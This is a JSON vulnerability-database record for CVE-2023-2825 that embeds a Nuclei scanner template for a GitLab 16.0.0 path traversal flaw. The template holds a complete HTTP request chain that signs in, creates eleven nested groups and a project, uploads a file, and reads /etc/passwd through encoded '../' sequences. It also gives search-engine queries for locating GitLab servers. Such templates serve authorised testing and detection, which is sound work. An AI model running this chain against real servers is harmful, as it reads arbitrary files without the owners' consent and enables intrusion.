{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2023-2825/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2023-2825/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2023-2825/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2023-2825/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2023-2825/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2023-2825"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2023-2825"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2023/CVE-2023-2825.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2023-2825\n\ninfo:\n  name: GitLab 16.0.0 - Path Traversal\n  author: DhiyaneshDk,rootxharsh,iamnoooob,pdresearch\n  severity: high\n  description: |\n    An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups\n  impact: |\n    Authenticated attackers can exploit path traversal vulnerabilities to read arbitrary files from GitLab 16.0.0 servers when attachments exist in public projects nested within at least five groups.\n  remediation: |\n    Upgrade GitLab to a version that is not affected by the path traversal vulnerability (CVE-2023-2825).\n  reference:\n    - https://about.gitlab.com/releases/2023/05/23/critical-security-release-gitlab-16-0-1-released/\n    - https://github.com/Occamsec/CVE-2023-2825\n    - https://labs.watchtowr.com/gitlab-arbitrary-file-read-gitlab-cve-2023-2825-analysis/\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-2825\n    - https://gitlab.com/gitlab-org/cves/-/blob/master/2023/CVE-2023-2825.json\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2023-2825\n    cwe-id: CWE-22\n    epss-score: 0.71641\n    epss-percentile: 0.99392\n    cpe: cpe:2.3:a:gitlab:gitlab:16.0.0:*:*:*:community:*:*:*\n  metadata:\n    verified: true\n    max-request: 16\n    vendor: gitlab\n    product: gitlab\n    shodan-query:\n      - title:\"Gitlab\"\n      - cpe:\"cpe:2.3:a:gitlab:gitlab\"\n      - http.title:\"gitlab\"\n    fofa-query: title=\"gitlab\"\n    google-query: intitle:\"gitlab\"\n  tags: cve2023,cve,gitlab,lfi,authenticated,intrusive,vuln,vkev\nvariables:\n  data: \"{{rand_base(5)}}\"\n\nhttp:\n  - raw:\n      - |\n        GET /users/sign_in HTTP/1.1\n        Host: {{Hostname}}\n      - |\n        POST /users/sign_in HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        Accept: */*\n\n        user%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&authenticity_token={{token_1}}\n      - |\n        POST /groups HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        Accept: */*\n\n        group%5Bparent_id%5D=&group%5Bname%5D={{data}}-1&group%5Bpath%5D={{data}}-1&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n      - |\n        POST /groups HTTP/1.1\n        Host: {{Hostname}}\n        Accept: */*\n        Content-Type: application/x-www-form-urlencoded\n\n        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-2&group%5Bpath%5D={{data}}-2&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n      - |\n        POST /groups HTTP/1.1\n        Host: {{Hostname}}\n        Accept: */*\n        Content-Type: application/x-www-form-urlencoded\n\n        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-3&group%5Bpath%5D={{data}}-3&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n      - |\n        POST /groups HTTP/1.1\n        Host: {{Hostname}}\n        Accept: */*\n        Content-Type: application/x-www-form-urlencoded\n\n        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-4&group%5Bpath%5D={{data}}-4&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n      - |\n        POST /groups HTTP/1.1\n        Host: {{Hostname}}\n        Accept: */*\n        Content-Type: application/x-www-form-urlencoded\n\n        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-5&group%5Bpath%5D={{data}}-5&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n      - |\n        POST /groups HTTP/1.1\n        Host: {{Hostname}}\n        Accept: */*\n        Content-Type: application/x-www-form-urlencoded\n\n        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-6&group%5Bpath%5D={{data}}-6&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n      - |\n        POST /groups HTTP/1.1\n        Host: {{Hostname}}\n        Accept: */*\n        Content-Type: application/x-www-form-urlencoded\n\n        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-7&group%5Bpath%5D={{data}}-7&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n      - |\n        POST /groups HTTP/1.1\n        Host: {{Hostname}}\n        Accept: */*\n        Content-Type: application/x-www-form-urlencoded\n\n        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-8&group%5Bpath%5D={{data}}-8&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n      - |\n        POST /groups HTTP/1.1\n        Host: {{Hostname}}\n        Accept: */*\n        Content-Type: application/x-www-form-urlencoded\n\n        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-9&group%5Bpath%5D={{data}}-9&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n      - |\n        POST /groups HTTP/1.1\n        Host: {{Hostname}}\n        Accept: */*\n        Content-Type: application/x-www-form-urlencoded\n\n        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-10&group%5Bpath%5D={{data}}-10&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n      - |\n        POST /groups HTTP/1.1\n        Host: {{Hostname}}\n        Accept: */*\n        Content-Type: application/x-www-form-urlencoded\n\n        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-11&group%5Bpath%5D={{data}}-11&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n      - |\n        @timeout: 15s\n        POST /projects HTTP/1.1\n        Host: {{Hostname}}\n        Accept: */*\n        Content-Type: application/x-www-form-urlencoded\n\n        project%5Bci_cd_only%5D=false&project%5Bname%5D=CVE-2023-2825&project%5Bselected_namespace_id%5D={{namespace_id}}&project%5Bnamespace_id%5D={{namespace_id}}&project%5Bpath%5D=CVE-2023-2825&project%5Bvisibility_level%5D=20&project%5Binitialize_with_readme=1&authenticity_token={{token_2}}\n      - |\n        POST /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads HTTP/1.1\n        Host: {{Hostname}}\n        Accept: */*\n        X-CSRF-Token: {{x-csrf-token}}\n        Content-Type: multipart/form-data; boundary=0ce2a9fbe06b6da89c138a35a1765ed6\n\n        --0ce2a9fbe06b6da89c138a35a1765ed6\n        Content-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}\"\n\n        {{randstr}}\n        --0ce2a9fbe06b6da89c138a35a1765ed6--\n      - |\n        GET /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads/{{upload-hash}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1\n        Host: {{Hostname}}\n        Accept: */*\n\n    host-redirects: true\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        words:\n          - 726f6f743a78\n        encoding: hex\n\n      - type: word\n        part: header\n        words:\n          - application/octet-stream\n          - etc%2Fpasswd\n        condition: and\n\n    extractors:\n      - type: regex\n        name: token_1\n        group: 1\n        regex:\n          - name=\"authenticity_token\" value=\"([A-Za-z0-9_-]+)\"\n        internal: true\n        part: body\n\n      - type: regex\n        name: token_2\n        group: 1\n        regex:\n          - name=\"csrf\\-token\" content=\"([A-Z_0-9a-z-]+)\"\n        internal: true\n        part: body\n\n      - type: regex\n        name: parent_id\n        group: 1\n        regex:\n          - href=\"\\/groups\\/new\\?parent_id=([0-9]+)\n        internal: true\n        part: body\n\n      - type: regex\n        name: namespace_id\n        group: 1\n        regex:\n          - ref=\"\\/projects\\/new\\?namespace_id=([0-9]+)\n        internal: true\n        part: body\n\n      - type: regex\n        name: x-csrf-token\n        group: 1\n        regex:\n          - const headers = \\{\"X\\-CSRF\\-Token\":\"([a-zA-Z-0-9_]+)\"\n        internal: true\n        part: body\n\n      - type: regex\n        name: upload-hash\n        group: 1\n        regex:\n          - '\"url\":\"\\/uploads\\/([0-9a-z]+)\\/'\n        internal: true\n        part: body\n# digest: 4b0a00483046022100f1ee0fb5a6065db11f05b509d85d52de38cbedcdd8a2f900c19e6db4341186d302210090226e797f68bb9cbecdc3c600540861aa1c617312bf30ef0a29bba55a88df56:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2023-2825"
}